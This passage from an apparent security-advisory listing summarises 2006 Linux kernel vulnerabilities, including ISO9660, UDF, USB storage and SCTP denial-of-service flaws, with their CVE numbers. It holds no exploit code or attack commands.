seems to be caused by a race condition and a signedness issue. When
performing a read operation on a corrupted ISO9660 fs stream, the
isofs_get_blocks() function will enter an infinite loop when
__find_get_block_slow() callback from sb_getblk() fails ("due to various
races between file io on the block device and getblk")." |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-2935
CVE-2006-4145
CVE-2006-3745
|
| Created: | September 1, 2006 |
Updated: | July 30, 2008 |
| Description: |
Previous versions of the kernel package are subject to several
vulnerabilities. Certain malformed UDF filesystems can cause the system to
crash (denial of service). Malformed CDROM firmware or USB storage devices
(such as USB keys) could cause system crash (denial of service), and if
they were intentionally malformed, can cause arbitrary code to run with
elevated privileges. In addition, the SCTP protocol is subject to a remote
system crash (denial of service) attack. |
| Alerts: |
|
Comments (none posted)
koffice: integer overflow